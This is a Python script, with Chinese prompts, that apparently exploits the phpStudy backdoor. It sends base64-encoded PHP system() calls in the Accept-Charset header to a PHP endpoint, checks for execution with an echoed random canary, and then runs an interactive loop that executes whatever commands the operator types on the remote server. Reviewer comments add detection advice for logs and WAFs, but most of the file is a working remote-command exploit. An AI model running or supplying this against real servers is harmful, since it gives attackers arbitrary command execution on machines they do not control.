

import base64
import sys
import string
import requests
import random
# Endpoint that every request in this script is sent to. 192.168.8.135 is an
# RFC 1918 private address and the scheme is plain HTTP, so the requests and
# responses travel unencrypted and are visible to network monitoring.
url = "http://192.168.8.135/ll.php"
def rce(url, cmd):
    """Send one command to *url* inside a request header and return its output.

    The command is wrapped in a PHP ``system('...');`` statement,
    base64-encoded, and sent as the value of the ``Accept-Charset`` header
    of a GET request. The request also carries
    ``Accept-Encoding: gzip,deflate`` (no space after the comma) and
    ``User-Agent: Feng``.

    Returns the response body up to the first ``<!DOCTYPE html`` marker,
    decoded as gb2312. ``str.index`` raises ``ValueError`` when the marker
    is absent from the response.

    NOTE(review): this header pair resembles the publicly reported phpStudy
    backdoor trigger, where a tampered PHP build evaluates the decoded
    Accept-Charset value. Nothing in this file names the server software,
    so confirm that on the host itself.

    Detection: Accept-Charset normally carries charset names such as
    ``utf-8``. A value that is valid base64 and decodes to PHP source is a
    strong signal in proxy/WAF/web-server logs, as are the fixed
    User-Agent and the space-less Accept-Encoding value sent here.
    """
    php_statement = "system('{}');".format(cmd)
    encoded_payload = base64.b64encode(php_statement.encode()).decode()

    request_headers = {
        "Accept-Charset": encoded_payload,
        "Accept-Encoding": "gzip,deflate",
        "User-Agent": "Feng",
    }
    response = requests.get(url=url, headers=request_headers)

    # The offset is found in the decoded text but applied to the raw bytes.
    # The two agree only while everything before the marker is single-byte.
    page_start = response.text.index("<!DOCTYPE html")
    return response.content[:page_start].decode('gb2312')
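def mAth():
    """Return a random 10-character marker of ASCII digits and letters.

    The script uses the marker as a canary: it asks the endpoint to echo it
    and checks whether it comes back in the response. It is drawn with
    ``random``, which is not a cryptographic source; that is adequate for a
    one-off response marker but not for secrets.
    """
    alphabet = string.digits + string.ascii_letters
    # One random.choice call per character, in order, so a seeded generator
    # yields the same marker as a character-by-character loop would.
    return "".join(random.choice(alphabet) for _ in range(10))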
# Canary probe: ask the endpoint to echo a fresh random marker and look for
# it in the reply. On the defender's side this appears as a single request
# whose Accept-Charset decodes to an `echo <10 alphanumerics>` command,
# followed (on success) by further requests from the same client.
oath = mAth()
cmd = "echo " + oath
print("目标网址:" + url)  # "Target URL:"

probe_reply = rce(url, cmd)
if oath not in probe_reply:
    exit("貌似并没有什么发现")  # "Nothing seems to have been found"
print("貌似有发现,尝试一下?")  # "Looks like something was found, try it?"

try:
    # iter(callable, sentinel) keeps prompting until the operator types "q".
    # Every other line is sent through rce() and the reply is printed.
    for cmd in iter(lambda: input("(p≧w≦q)>cmd >:"), "q"):
        print(rce(url, cmd))
except KeyboardInterrupt:
    print("程序终止")  # "Program terminated"